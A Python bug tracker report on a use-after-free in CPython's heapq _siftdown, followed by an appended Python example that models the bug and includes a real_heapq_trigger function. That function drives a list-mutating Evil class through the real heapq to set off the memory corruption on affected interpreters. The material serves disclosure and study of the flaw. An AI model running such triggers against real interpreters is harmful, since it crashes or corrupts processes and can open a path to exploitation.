[issue24099] Use after free in siftdown (1)
paul
report at bugs.python.org
Fri May 1 16:11:20 CEST 2015
New submission from paul:
# _siftdown(PyListObject *heap, Py_ssize_t startpos, Py_ssize_t pos)
# ...
# newitem = PyList_GET_ITEM(heap, pos);
# Py_INCREF(newitem);
# /* Follow the path to the root, moving parents down until finding
# a place newitem fits. */
# while (pos > startpos){
# parentpos = (pos - 1) >> 1;
# 1 parent = PyList_GET_ITEM(heap, parentpos);
# 2 cmp = PyObject_RichCompareBool(newitem, parent, Py_LT);
# if (cmp == -1) {
# Py_DECREF(newitem);
# return -1;
# }
# 3 if (size != PyList_GET_SIZE(heap)) {
# Py_DECREF(newitem);
# PyErr_SetString(PyExc_RuntimeError,
# "list changed size during iteration");
# return -1;
# }
# if (cmp == 0)
# break;
# 4 Py_INCREF(parent);
# ...
#
# 1. parent isn't protected (refcnt == 1).
# 2. A custom compare function deletes all objects in "heap" and repopulates it with
# fresh instances. "parent" is freed.
# 3. The check is ineffective: the heap was mutated while preserving its size.
# 4. Use after free. The crash will manifest itself later.
----------
files: poc_siftdown1.py
messages: 242316
nosy: pkt
priority: normal
severity: normal
status: open
title: Use after free in siftdown (1)
type: crash
versions: Python 3.4
Added file: http://bugs.python.org/file39250/poc_siftdown1.py
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24099>
_______________________________________
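Added example (not part of the report, its attached PoC, or CPython): a pure-Python mirror of the quoted _siftdown loop, driven by a constructed Evil class whose __lt__ replaces every element of the heap with fresh instances while keeping len(heap) unchanged. Running it shows the two facts the report relies on: the size check at step 3 never fires, and the object borrowed as "parent" at step 1 is no longer referenced by the list once the compare returns, which is exactly the state in which the C code's Py_INCREF(parent) at step 4 touches freed memory. The names model_siftdown, demonstrate and real_heapq_trigger are this example's own; the last one pushes the same Evil shape through the real heapq module so the trigger pattern can be tried against a given interpreter.

```python
import heapq


class Evil:
    """Constructed item whose __lt__ mutates the list it is stored in."""

    def __init__(self, heap):
        self.heap = heap  # the list this instance lives in

    def __lt__(self, other):
        # Replace every element with a fresh instance. len() is unchanged,
        # so a size-only check cannot notice; object identities all change.
        n = len(self.heap)
        self.heap[:] = [Evil(self.heap) for _ in range(n)]
        return True  # keep sifting toward the root


def model_siftdown(heap, startpos, pos):
    """Pure-Python mirror of the quoted (unpatched) C loop.

    Returns one record per loop iteration saying whether the size check
    fired and whether the object borrowed as `parent` before the compare
    is still referenced by the list afterwards. In the C code that object
    is owned only by the list (refcnt 1), so "not in heap" means it was
    freed before step 4 touches it again.
    """
    records = []
    size = len(heap)
    newitem = heap[pos]
    while pos > startpos:
        parentpos = (pos - 1) >> 1
        parent = heap[parentpos]                # step 1: unprotected borrow
        cmp = newitem < parent                  # step 2: runs Evil.__lt__
        size_changed = size != len(heap)        # step 3: the only guard
        if size_changed:
            raise RuntimeError("list changed size during iteration")
        still_there = any(x is parent for x in heap)
        records.append({
            "size_check_fired": size_changed,
            "parent_still_in_heap": still_there,
            "would_be_use_after_free": not still_there,
        })
        if not cmp:
            break
        heap[pos] = parent                      # step 4: Py_INCREF(parent) in C
        pos = parentpos
    heap[pos] = newitem
    return records


def demonstrate(n=8):
    """Build an n-item list of Evil objects and sift the last one up."""
    heap = []
    heap.extend(Evil(heap) for _ in range(n))
    return model_siftdown(heap, 0, n - 1)


def real_heapq_trigger(n=8):
    """Same shape against the C heapq: push an Evil item onto an Evil heap.

    This is the pattern the report describes, not its attached PoC. The
    report says the corruption surfaces later on an affected interpreter;
    on an interpreter without the bug the push completes and the heap
    still holds n items.
    """
    heap = []
    heap.extend(Evil(heap) for _ in range(n - 1))
    heapq.heappush(heap, Evil(heap))
    return heap


if __name__ == "__main__":
    for i, rec in enumerate(demonstrate()):
        print("iteration", i, rec)
    print("real heapq heap size:", len(real_heapq_trigger()))
```

Every iteration of the model reports size_check_fired False and would_be_use_after_free True: a guard that only compares sizes cannot distinguish "same list" from "same-sized list full of new objects", which is why holding a reference to parent across the compare (or re-reading it from the list afterwards) is the check a practitioner would look for in any loop that runs user code between fetching a borrowed item and using it.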